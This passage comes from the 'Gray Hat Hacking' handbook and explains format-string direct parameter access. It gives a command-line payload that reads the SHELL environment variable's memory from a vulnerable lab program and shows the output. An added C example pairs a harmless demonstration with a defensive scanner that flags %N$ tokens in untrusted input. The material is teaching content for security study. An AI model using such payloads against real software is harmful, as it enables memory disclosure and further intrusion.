To dump all environment variables for your current session,
type "env | more" at the shell prompt.
Gray Hat Hacking: The Ethical Hacker's Handbook
Chapter 8: Advanced Linux Exploits (Part III)
Simplifying with Direct Parameter Access
To make things even easier, you can reach the fourth parameter on the stack directly by
using what is called direct parameter access. The #$ format token (where # is the parameter
number) tells the format function to skip over that many parameters and select the named
one directly, without consuming the ones before it. For example:
$cat dirpar.c
//dirpar.c
#include <stdio.h>

int main(void)
{
    /* %3$s selects the third argument ("test") directly, skipping 1 and 2 */
    printf("This is a %3$s.\n", 1, 2, "test");
    return 0;
}
$gcc -o dirpar dirpar.c
$./dirpar
This is a test.
$
When you use the direct parameter format token from the command line, you need to
escape the $ with a \ to keep the shell from interpreting it. Let's put this all to use
and reprint the location of the SHELL environment variable:
$ ./fmtstr `printf "\x84\xfd\xff\xbf"`"%4\$s"
??????/bin/bash
Canary at 0x08049440 = 0x00000000
Notice how short the format string can be now.
CAUTION The preceding format works for bash. Other shells such as tcsh
require other formats, for example:
$ ./fmtstr `printf "\x84\xfd\xff\xbf"`'%4\$s'
Notice the use of a single quote on the end.
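As an added example (not code from the book), the following C program shows both sides of the direct parameter token: snprintf using %N$ to pull arguments out of order, which goes slightly beyond the book's case by referencing every position, and a small scanner a defender can run over untrusted input to flag any %N$ reference before that input could ever be passed as a format string. The names direct_param_demo and max_positional_index are my own.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Direct parameter access: "%3$s" picks the third argument directly
 * instead of consuming arguments in order. Every position is referenced
 * here because glibc's fortified printf aborts on unreferenced ones. */
int direct_param_demo(char *out, size_t outlen)
{
    return snprintf(out, outlen, "This is a %3$s (%1$d of %2$d).", 1, 2, "test");
}

/* Return the highest %N$ positional index found in fmt, or 0 if none.
 * Untrusted input that yields a nonzero result carries the direct
 * parameter token and must never be used as a printf format argument. */
int max_positional_index(const char *fmt)
{
    int max = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* "%%" is a literal percent sign */
            p++;
            continue;
        }
        int n = 0;
        const char *q = p + 1;
        while (isdigit((unsigned char)*q))
            n = n * 10 + (*q++ - '0');
        if (*q == '$' && n > max)
            max = n;
    }
    return max;
}

int main(void)
{
    char buf[64];
    direct_param_demo(buf, sizeof buf);
    puts(buf);
    /* constructed sample inputs: only the last two use direct parameter access */
    const char *inputs[] = { "hello %s", "100%% done", "%4$s", "%2$d then %10$x" };
    for (size_t i = 0; i < sizeof inputs / sizeof *inputs; i++)
        printf("%-18s -> max positional index %d\n",
               inputs[i], max_positional_index(inputs[i]));
    return 0;
}
```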